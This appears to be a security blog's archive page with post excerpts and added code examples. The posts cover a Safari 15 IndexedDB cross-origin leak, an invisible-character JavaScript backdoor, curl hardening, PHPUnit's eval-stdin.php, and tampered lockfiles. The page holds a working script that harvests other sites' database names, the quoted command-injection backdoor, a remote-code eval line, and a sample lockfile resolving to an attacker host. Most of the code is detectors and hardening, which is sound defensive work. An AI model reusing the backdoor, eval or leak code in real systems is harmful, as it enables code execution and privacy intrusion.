Exploiting IndexedDB API information leaks in Safari 15

There’s a pretty nasty information leak in Safari 15: whenever a site interacts with an IndexedDB database, that database’s name leaks to other tabs, including tabs of other origins. In Safari 15 on macOS, and in all browsers on iOS and iPadOS 15, the IndexedDB API is violating the same-origin policy. Every time a website interacts with a database, a new (empty) …
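An added example (not code from the post or from the FingerprintJS write-up it cites) of how a page can observe the leak from its side: it creates one database of its own, then polls indexedDB.databases() and reports any name it never created. On an affected Safari 15 build, databases created by sites in other tabs show up here; on a patched browser the list only ever contains the page's own database. The database name OWN_DB and the polling interval are assumptions made for this example; the pure helper foreignDatabaseNames is kept separate so it can be checked outside a browser.

```javascript
// Added example: observe cross-origin IndexedDB database names from a page.
// Assumes indexedDB.databases() is available (Safari 14+); OWN_DB is an
// arbitrary name chosen for this example.

const OWN_DB = "leak-observer-local";

// Pure helper: which listed names were not created by this page?
// Accepts the {name, version} objects indexedDB.databases() returns,
// or plain strings; de-duplicates and sorts for stable output.
function foreignDatabaseNames(ownNames, listed) {
  const own = new Set(ownNames);
  const seen = new Set();
  const foreign = [];
  for (const entry of listed) {
    const name = typeof entry === "string" ? entry : entry && entry.name;
    if (!name || own.has(name) || seen.has(name)) continue;
    seen.add(name);
    foreign.push(name);
  }
  return foreign.sort();
}

// Create our own database so the baseline contains a known name.
function openOwnDatabase() {
  return new Promise((resolve, reject) => {
    const req = indexedDB.open(OWN_DB, 1);
    req.onupgradeneeded = () => req.result.createObjectStore("kv");
    req.onsuccess = () => { req.result.close(); resolve(); };
    req.onerror = () => reject(req.error);
  });
}

// Poll and log every name that is not ours, once. The leaked databases are
// empty, so the name itself is the signal (it often identifies the site).
async function watchForLeaks(intervalMs = 1000) {
  await openOwnDatabase();
  const reported = new Set();
  setInterval(async () => {
    const listed = await indexedDB.databases();
    for (const name of foreignDatabaseNames([OWN_DB], listed)) {
      if (reported.has(name)) continue;
      reported.add(name);
      console.log("database name visible from another origin:", name);
    }
  }, intervalMs);
}

// Only start in a browser that exposes the API; harmless under Node.
if (typeof indexedDB !== "undefined" && typeof indexedDB.databases === "function") {
  watchForLeaks();
}
```

Load the script in a tab, then browse sites that use IndexedDB in other tabs of the same session; in an affected browser their database names appear in this tab's console.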

The Invisible JavaScript Backdoor

Wolfgang Ettlinger carefully crafted this JavaScript snippet, which contains a backdoor:

```js
const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
  // The "blank" name after `timeout` is U+3164 HANGUL FILLER, which most
  // fonts render as empty space: a second query parameter is destructured here.
  const { timeout,ㅤ} = req.query;
  const checkCommands = [
    'ping -c 1 google.com',
    'curl -s http://example.com/',ㅤ   // the same filler variable, i.e. a command taken from the query string
  ];

  try {
    await Promise.all(checkCommands.map(cmd => …
```
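The check a reviewer wants against this trick is mechanical: flag every code point that renders as blank or is invisible in an editor. The scanner below is an added example, not code from the post or from Wolfgang Ettlinger; the character list is an assumption covering the usual suspects (Hangul fillers, zero-width characters, the BOM, bidi controls), not every possible one, and the sample it scans is constructed from the two lines of the snippet that carry the filler.

```javascript
// Added example: find invisible / blank-rendering code points in source text.
// The SUSPICIOUS table is an assumption: common offenders, not an exhaustive list.

const SUSPICIOUS = new Map([
  [0x3164, "HANGUL FILLER"],
  [0x115f, "HANGUL CHOSEONG FILLER"],
  [0x1160, "HANGUL JUNGSEONG FILLER"],
  [0xffa0, "HALFWIDTH HANGUL FILLER"],
  [0x00a0, "NO-BREAK SPACE"],
  [0x200b, "ZERO WIDTH SPACE"],
  [0x200c, "ZERO WIDTH NON-JOINER"],
  [0x200d, "ZERO WIDTH JOINER"],
  [0x2060, "WORD JOINER"],
  [0xfeff, "ZERO WIDTH NO-BREAK SPACE (BOM)"],
  [0x202a, "LEFT-TO-RIGHT EMBEDDING"],
  [0x202b, "RIGHT-TO-LEFT EMBEDDING"],
  [0x202c, "POP DIRECTIONAL FORMATTING"],
  [0x202d, "LEFT-TO-RIGHT OVERRIDE"],
  [0x202e, "RIGHT-TO-LEFT OVERRIDE"],
  [0x2066, "LEFT-TO-RIGHT ISOLATE"],
  [0x2067, "RIGHT-TO-LEFT ISOLATE"],
  [0x2068, "FIRST STRONG ISOLATE"],
  [0x2069, "POP DIRECTIONAL ISOLATE"],
]);

// One finding per suspicious code point: 1-based line and column (columns
// counted in code points, so astral characters do not skew positions).
function findInvisibleCharacters(source) {
  const findings = [];
  source.split("\n").forEach((line, i) => {
    let col = 0;
    for (const ch of line) { // string iteration yields whole code points
      col += 1;
      const cp = ch.codePointAt(0);
      if (!SUSPICIOUS.has(cp)) continue;
      findings.push({
        line: i + 1,
        col,
        codePoint: "U+" + cp.toString(16).toUpperCase().padStart(4, "0"),
        name: SUSPICIOUS.get(cp),
      });
    }
  });
  return findings;
}

// Constructed sample: the two lines of the backdoored snippet that carry
// U+3164, written with an escape so the character is visible here.
const SAMPLE = [
  "const { timeout,\u3164} = req.query;",
  "const checkCommands = [",
  "  'ping -c 1 google.com',",
  "  'curl -s http://example.com/',\u3164",
  "];",
].join("\n");

function scanSample() {
  return findInvisibleCharacters(SAMPLE);
}

for (const f of scanSample()) {
  console.log(`${f.line}:${f.col} ${f.codePoint} ${f.name}`);
}
```

Wiring this into a pre-commit hook or CI step over every changed file (not just JavaScript) is the cheap, durable fix; most code hosts and editors now also highlight these characters, but a build that fails loudly does not depend on someone noticing a faint marker.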

PHP Curl Security Hardening

Good post (with accompanying code) on PHP.Watch on how to tighten the almighty curl:

1. Limit curl protocols
2. Do not enable automatic redirects unless absolutely necessary
3. If redirects are enabled, limit the allowed protocols (if different from #1 above)
4. If redirects are enabled, set a strict limit
5. Set a strict time-out
6. Do not disable …
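The checklist is not PHP-specific, so here is the same hardening applied to an outbound HTTP client in Node (fetch, Node 18+). This is an added example, not PHP.Watch's PHP code: protocol allowlist, redirects off by default, every redirect hop re-validated against its own protocol allowlist and counted against a strict limit, and a per-request timeout. The policy field names, hardenedFetch and the stub routes are assumptions made for this example; the fetch implementation is injectable so the policy can be exercised without a network.

```javascript
// Added example: the curl-hardening checklist applied to a Node fetch wrapper.
// Not PHP.Watch's code; policy names, hardenedFetch and STUB_ROUTES are assumptions.

const DEFAULT_POLICY = {
  protocols: ["https:"],          // 1. limit protocols
  followRedirects: false,         // 2. no automatic redirects unless needed
  redirectProtocols: ["https:"],  // 3. protocols allowed for redirect targets
  maxRedirects: 3,                // 4. strict redirect limit
  timeoutMs: 5000,                // 5. strict time-out
};

// Throws unless the URL's scheme is on the allowlist; returns the parsed URL.
function assertProtocol(url, allowed) {
  const u = new URL(url);
  if (!allowed.includes(u.protocol)) {
    throw new Error(`protocol ${u.protocol} not allowed for ${url}`);
  }
  return u;
}

// Redirects are followed by hand (redirect: "manual") so every hop is
// re-validated and counted; the timer aborts a hop that exceeds timeoutMs.
async function hardenedFetch(url, policy = {}, fetchImpl = globalThis.fetch) {
  const p = { ...DEFAULT_POLICY, ...policy };
  let current = assertProtocol(url, p.protocols).href;
  const hops = [];
  for (let hop = 0; ; hop++) {
    const controller = new AbortController();
    const timer = setTimeout(() => controller.abort(), p.timeoutMs);
    let res;
    try {
      res = await fetchImpl(current, { redirect: "manual", signal: controller.signal });
    } finally {
      clearTimeout(timer);
    }
    const location = res.status >= 300 && res.status < 400 ? res.headers.get("location") : null;
    if (!location) return { response: res, hops };
    if (!p.followRedirects) throw new Error(`redirect refused: ${current} -> ${location}`);
    if (hop >= p.maxRedirects) throw new Error(`too many redirects (> ${p.maxRedirects})`);
    const next = assertProtocol(new URL(location, current).href, p.redirectProtocols);
    hops.push(next.href);
    current = next.href;
  }
}

// Constructed stub responses for an offline run; `location` mimics the header.
const STUB_ROUTES = {
  "https://api.example/start": { status: 302, location: "/step1" },
  "https://api.example/step1": { status: 302, location: "http://api.example/plain" }, // downgrade
  "https://api.example/ok": { status: 200 },
  "https://loop.example/a": { status: 301, location: "/b" },
  "https://loop.example/b": { status: 301, location: "/a" },
};

function stubFetch(routes) {
  return async (url) => {
    const r = routes[url];
    if (!r) throw new Error(`no stub route for ${url}`);
    return { status: r.status, headers: { get: (h) => (h.toLowerCase() === "location" ? r.location || null : null) } };
  };
}

// Runs each scenario against the stub and returns a one-line outcome for it.
async function demo(fetchImpl = stubFetch(STUB_ROUTES)) {
  const attempt = async (url, policy) => {
    try {
      const { hops } = await hardenedFetch(url, policy, fetchImpl);
      return `ok (${hops.length} redirects)`;
    } catch (e) {
      return e.message;
    }
  };
  return {
    plainHttp: await attempt("http://api.example/ok"),                                // refused by rule 1
    redirectOff: await attempt("https://api.example/start"),                          // refused by rule 2
    downgrade: await attempt("https://api.example/start", { followRedirects: true }), // refused by rule 3
    loop: await attempt("https://loop.example/a", { followRedirects: true }),         // refused by rule 4
    direct: await attempt("https://api.example/ok"),
  };
}

demo().then((results) => console.log(results));
```

The downgrade case is the one people forget: the first URL is https, but the second redirect points at http, and a client that follows redirects automatically will send the request in clear text (and, with curl's defaults, to any scheme the server names).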

PHPUnit: A Security Risk?

The author of PHPUnit was a bit surprised when he received a mail stating that PHPUnit was a security risk and hackers could remotely execute PHP code through a file named eval-stdin.php that used to ship with PHPUnit:

```php
// eval-stdin.php
eval('?>' . \file_get_contents('php://input'));
```

Even though the eval-stdin.php file itself indeed was vulnerable, it never …
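Whatever the verdict on PHPUnit itself, requests for eval-stdin.php are a staple of automated scanning, and the one thing worth knowing from your own logs is whether such a request ever got a 2xx, because that means a vendor/ tree is reachable through the web root. The detector below is an added example, not code from the post or from PHPUnit: it parses common-log-format lines, groups probes by source address and records whether any of them succeeded. The log lines are constructed for this example.

```javascript
// Added example: spot eval-stdin.php probes in access logs and tell apart
// scanner noise (404s) from a reachable file (2xx). Log lines are constructed.

const ACCESS_LOG = [
  '203.0.113.7 - - [10/Jan/2022:10:01:02 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Jan/2022:10:01:03 +0000] "POST /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [10/Jan/2022:10:02:10 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Jan/2022:10:01:04 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
];

// Common Log Format: ip ident user [time] "method path proto" status size ...
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Matches on the file name wherever it sits, after stripping the query string
// and percent-decoding, so /eval-stdin%2Ephp?x=1 is not missed.
function isEvalStdinProbe(req) {
  let path = req.path.split("?")[0];
  try { path = decodeURIComponent(path); } catch { /* keep the raw path */ }
  return /\/eval-stdin\.php$/i.test(path);
}

// Per source address: number of probes, distinct paths tried, and whether
// any probe got a 2xx (the file is reachable: remove it, or move vendor/
// out of the document root).
function detectEvalStdinProbes(lines) {
  const bySource = new Map();
  for (const line of lines) {
    const req = parseLine(line);
    if (!req || !isEvalStdinProbe(req)) continue;
    const s = bySource.get(req.ip) || { ip: req.ip, probes: 0, reachable: false, paths: [] };
    s.probes += 1;
    if (req.status >= 200 && req.status < 300) s.reachable = true;
    if (!s.paths.includes(req.path)) s.paths.push(req.path);
    bySource.set(req.ip, s);
  }
  return [...bySource.values()];
}

for (const s of detectEvalStdinProbes(ACCESS_LOG)) {
  console.log(`${s.ip}: ${s.probes} probe(s), reachable=${s.reachable}, paths=${s.paths.join(" ")}`);
}
```

Feed it real lines with something like `detectEvalStdinProbes(fs.readFileSync("access.log", "utf8").split("\n"))`; a `reachable: true` entry is an incident, the rest is background noise worth rate-limiting at most.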

Beware when merging Pull Requests with a changed lockfile

When viewing a diff that contains a lockfile (a yarn.lock, say) on GitHub, GitHub doesn’t always show the differences (see screenshot above), as the changes in such files tend to be quite big. And even if it were to show the changes, does one really take a close look at them? With this …
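Rather than squinting at a collapsed diff, a reviewer can audit the lockfile mechanically. The script below is an added example, not code from the post: it reads yarn.lock (v1) entries, flags any tarball that would be fetched from a host other than the registry, over plain http, or without an integrity hash, and lists entries whose resolved URL changed between the base branch and the pull request. That the resolved field decides where the tarball is downloaded from is general yarn/npm behaviour, not something the excerpt states. The package names, URLs and hashes in the two sample lockfiles are constructed for this example.

```javascript
// Added example: audit a yarn.lock v1 for suspicious tarball sources and
// report resolved-URL changes between two versions of the file.
// The sample lockfiles below are constructed; ALLOWED_HOSTS is an assumption.

const ALLOWED_HOSTS = ["registry.yarnpkg.com", "registry.npmjs.org"];

// Minimal yarn.lock v1 reader: an unindented `key:` line starts an entry; the
// two-space-indented version/resolved/integrity lines fill it in. Nested
// `dependencies:` blocks (deeper indentation) are ignored.
function parseYarnLock(text) {
  const entries = [];
  let current = null;
  for (const raw of text.split("\n")) {
    const line = raw.replace(/\r$/, "");
    if (!line.trim() || line.startsWith("#")) continue;
    if (!line.startsWith(" ")) {
      const key = line.replace(/:\s*$/, "").replace(/^"|"$/g, "");
      current = { key, version: null, resolved: null, integrity: null };
      entries.push(current);
      continue;
    }
    const m = current && /^ {2}(version|resolved|integrity) (.+)$/.exec(line);
    if (m) current[m[1]] = m[2].trim().replace(/^"|"$/g, "");
  }
  return entries;
}

function auditLockfile(text, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  for (const e of parseYarnLock(text)) {
    if (!e.resolved) { findings.push({ key: e.key, issue: "no resolved URL" }); continue; }
    let url;
    try { url = new URL(e.resolved); } catch { findings.push({ key: e.key, issue: "unparseable resolved URL" }); continue; }
    if (url.protocol !== "https:") findings.push({ key: e.key, issue: `fetched over ${url.protocol}` });
    if (!allowedHosts.includes(url.hostname)) findings.push({ key: e.key, issue: `fetched from unexpected host ${url.hostname}` });
    if (!e.integrity) findings.push({ key: e.key, issue: "missing integrity hash" });
  }
  return findings;
}

// Entries present in both files whose resolved URL differs.
function resolvedChanges(beforeText, afterText) {
  const before = new Map(parseYarnLock(beforeText).map((e) => [e.key, e]));
  const changes = [];
  for (const e of parseYarnLock(afterText)) {
    const prev = before.get(e.key);
    if (prev && prev.resolved !== e.resolved) changes.push({ key: e.key, from: prev.resolved, to: e.resolved });
  }
  return changes;
}

// Constructed sample: the base branch's lockfile ...
const LOCK_BEFORE = [
  "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.",
  "# yarn lockfile v1",
  "",
  "",
  "example-lib@^1.2.0:",
  '  version "1.2.3"',
  '  resolved "https://registry.yarnpkg.com/example-lib/-/example-lib-1.2.3.tgz#0000000000000000000000000000000000000000"',
  "  integrity sha512-PLACEHOLDERHASH0==",
  "",
  '"@scope/other-lib@^2.0.0":',
  '  version "2.0.1"',
  '  resolved "https://registry.yarnpkg.com/@scope/other-lib/-/other-lib-2.0.1.tgz#1111111111111111111111111111111111111111"',
  "  integrity sha512-PLACEHOLDERHASH1==",
  "  dependencies:",
  '    example-lib "^1.2.0"',
].join("\n");

// ... and the pull request's version: same packages, but example-lib now
// comes from another host and its integrity line is gone.
const LOCK_AFTER = [
  "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.",
  "# yarn lockfile v1",
  "",
  "",
  "example-lib@^1.2.0:",
  '  version "1.2.3"',
  '  resolved "https://cdn.attacker.example/example-lib-1.2.3.tgz"',
  "",
  '"@scope/other-lib@^2.0.0":',
  '  version "2.0.1"',
  '  resolved "https://registry.yarnpkg.com/@scope/other-lib/-/other-lib-2.0.1.tgz#1111111111111111111111111111111111111111"',
  "  integrity sha512-PLACEHOLDERHASH1==",
  "  dependencies:",
  '    example-lib "^1.2.0"',
].join("\n");

console.log("findings:", auditLockfile(LOCK_AFTER));
console.log("resolved changes:", resolvedChanges(LOCK_BEFORE, LOCK_AFTER));
```

In CI the two inputs would be `git show origin/main:yarn.lock` and the checked-out file; any finding or resolved change on a PR that did not intend to touch dependencies should block the merge.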

Princesses make terrible passwords

From the Firefox Blog: When the Disney+ streaming service rolled out, millions of people flocked to set up accounts. And within a week, thousands of poor unfortunate souls reported that their Disney passwords were hacked. According to media reports, some Disney+ account holders have lost their account access while hackers have sold their logins online. …

Learn about security by hacking a fake bank using a real hacking method

Cool interactive site showing you how to perform a Server Side Request Forgery hack, based on a true incident: The following interactive tutorial is a reconstruction of Capital One’s data breach incident that exposed the records of almost 106 million customers. Paige Thompson is accused of breaking into a Capital One server and gaining access …